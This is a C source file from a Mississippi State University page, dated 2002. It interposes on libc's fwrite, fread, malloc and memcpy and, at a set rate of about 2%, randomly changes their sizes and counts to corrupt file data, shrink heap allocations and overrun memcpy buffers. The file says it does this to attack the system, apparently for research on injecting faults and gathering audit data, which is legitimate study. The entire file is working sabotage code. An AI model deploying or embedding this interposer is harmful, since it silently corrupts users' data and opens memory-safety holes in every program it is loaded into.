|
 |
/*****************************************************************************
corruotingData.c: Interposition library to capture function calls from the libc
and attack the system by corrupting data thta is stored or taked from a file
using the fwrite and fread functions, and corrupoting data in when the malloc
operation is called
By:
Miguel Torres
Computer Science, Mississippi State University
July 2002
Based on:
Profiling and tracind gynamic library usage via interposition (Timothy Curry)
Generation of application level audit data via library interposition (Kuperman and
Spafford, 1999)
The Thesis work by German Florez at the CCSR at Mississippi State University
******************************************************************************/
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/shm.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include "signal.h"
#include <sys/utsname.h>
// For Random Generation
#include "randomlib.h"
// Sets the Seeds for the random generator
#define RANDOM (double)random()/RAND_MAX
//#define RANDOM (double)random((time(NULL))%31328)/RAND_MAX
#define INIT_RANDS \
srand(time(NULL)); \
RandomInitialise((int)(time(NULL)*RANDOM)%31328,(int)(time(NULL)*RANDOM)%30081);
// Frecuency to attack
#define PERCENTAJE 2
#define TRUE 1
#define FALSE 0
static int DoProfile=TRUE;
#ifdef ATTACK
/*Description Writes to a stream.
fwrite appends n items of data each of length size bytes to the given output file.
The data written begins at ptr.
The total number of bytes written is (n x size). ptr in the declarations is a pointer to any object.
*/
size_t fwrite(const void *ptr, size_t size, size_t n, FILE *stream)
{
// The actual function
typedef size_t(*function_type) (const void *ptr, size_t size, size_t n, FILE *stream);
static function_type function=NULL;
static char* function_name="fwrite";
// Sets the seed for the random number generator
size_t retval;
static int first_time=TRUE;
if (!function){
function = (function_type) dlsym(RTLD_NEXT,function_name);
}
#ifdef PRINT_OUTPUT
printf("_W %d\n",DoProfile);
fflush(stdout);
#endif
if (DoProfile){
#ifdef PRINT_OUTPUT
printf("_WProfiling\n");
fflush(stdout);
#endif
/*
** Seed the random number generator with the current time
** of day if we haven't done so yet.
*/
if( first_time ){
first_time = FALSE;
// Random Generation
INIT_RANDS
}
if(RandomInt(0,100)<PERCENTAJE){
if(ptr){
//Corromper
//(char*)ptr[rand() % n][rand() % size]='0'
;
//Cambiar tamanno de la memoria a almacenar
//size+= (size/2) - (rand()%(size-1));
n+= (n/2) - (RandomInt(0,n-1));
#ifdef PRINT_OUTPUT
printf("_WAttacked\n");
fflush(stdout);
#endif
}
#ifdef PRINT_OUTPUT
printf("_WRandom\n");
fflush(stdout);
#endif
}
//execute the funtion and then profile
retval = ((*function)(ptr,size,n,stream));
}
else //do not profile, only execute
retval = ((*function)(ptr,size,n,stream));
return (retval);
}
/*
Reads data from a stream.
fread reads n items of data each of length size bytes from the given input stream into a block pointed to by ptr.
The total number of bytes read is (n * size).
*/
size_t fread(void *ptr, size_t size, size_t n, FILE *stream)
{
typedef size_t(*function_type) (const void *ptr, size_t size, size_t n, FILE *stream);
static function_type function=NULL;
static char* function_name="fread";
// Sets the seed for the random number generator
static int first_time=TRUE;
size_t retval;
if (!function){
function = (function_type) dlsym(RTLD_NEXT,function_name);
}
#ifdef PRINT_OUTPUT
printf("_R %d\n",DoProfile);
fflush(stdout);
#endif
if (DoProfile){
/*
** Seed the random number generator with the current time
** of day if we haven't done so yet.
*/
#ifdef PRINT_OUTPUT
printf("_RProfiling %d\n",DoProfile);
fflush(stdout);
#endif
if( first_time ){
first_time = FALSE;
// Random Generation
INIT_RANDS
}
if(RandomInt(0,100)<PERCENTAJE){
if(ptr){
//Changes the size of the allocated memory
//size+= (size/2) - (rand()%(size-1));
n+= RandomInt(-(n-1),n-1);
#ifdef PRINT_OUTPUT
printf("_RAttacking\n");
fflush(stdout);
#endif
}
#ifdef PRINT_OUTPUT
printf("_RRandom\n");
fflush(stdout);
#endif
}
//execute the funtion and then profile
retval = ((*function)(ptr,size,n,stream));
}
else //do not profile, only execute
retval = ((*function)(ptr,size,n,stream));
return (retval);
}
/*
malloc allocates a block of size bytes from the memory heap.
It allows a program to allocate memory explicitly as it's needed,
and in the exact amounts needed.
*/
void* malloc (size_t size)
{
typedef void*(*function_type) (size_t size);
static function_type function=NULL;
static char* function_name="malloc";
static int first_time=TRUE;
void* retval;
if (!function){
function = (function_type) dlsym(RTLD_NEXT,function_name);
}
#ifdef PRINT_OUTPUT
printf("_MA %d\n",DoProfile);
fflush(stdout);
#endif
if (DoProfile){
#ifdef PRINT_OUTPUT
printf("_MAProfiling %d\n",DoProfile);
fflush(stdout);
#endif
/*
** Seed the random number generator with the current time
** of day if we haven't done so yet.
*/
if( first_time ){
first_time = FALSE;
// Random Generation
INIT_RANDS
}
int r;
if((r=RandomInt(0,100))<PERCENTAJE){
size+= RandomInt(-(size-1),size-1);
#ifdef PRINT_OUTPUT
printf("_MAAttacking\n");
fflush(stdout);
#endif
}
#ifdef PRINT_OUTPUT
printf("%d\n",r);
fflush(stdout);
#endif
//execute the funtion and then profile
retval = ((*function)(size));
}
else //do not profile, only execute
retval = ((*function)(size));
return (retval);
}
/*
Copies a block of n bytes.
memcpy is available on UNIX System V systems.
memcpy copies a block of n bytes from src to dest.
If src and dest overlap, the behavior of memcpy is undefined.
*/
void *memcpy(void *dest, const void *src, size_t n)
{
typedef void*(*function_type) (void *dest, const void *src, size_t n);
static function_type function=NULL;
static char* function_name="memcpy";
void* retval;
static int first_time=TRUE;
if (!function){
function = (function_type) dlsym(RTLD_NEXT,function_name);
}
#ifdef PRINT_OUTPUT
printf("_MC %d\n",DoProfile);
fflush(stdout);
#endif
if (DoProfile){
#ifdef PRINT_OUTPUT
printf("_MCProfiling %d\n",DoProfile);
fflush(stdout);
#endif
/*
** Seed the random number generator with the current time
** of day if we haven't done so yet.
*/
if( first_time ){
first_time = FALSE;
// Random Generation
INIT_RANDS
}
if(RandomInt(0,100)<PERCENTAJE){
if(src){
n+= RandomInt(-(n-1),n-1);
#ifdef PRINT_OUTPUT
printf("_MCAttacking\n");
fflush(stdout);
#endif
}
#ifdef PRINT_OUTPUT
printf("_MCRandom\n");
fflush(stdout);
#endif
}
//execute the funtion and then profile
retval = ((*function)(dest, src, n));
}
else //do not profile, only execute
retval = ((*function)(dest, src, n));
return (retval);
}
#endif
syntax highlighted by Code2HTML, v. 0.9.1 |
Questions and comments about this web site may be directed to the webmaster at rwm8@cse.msstate.edu
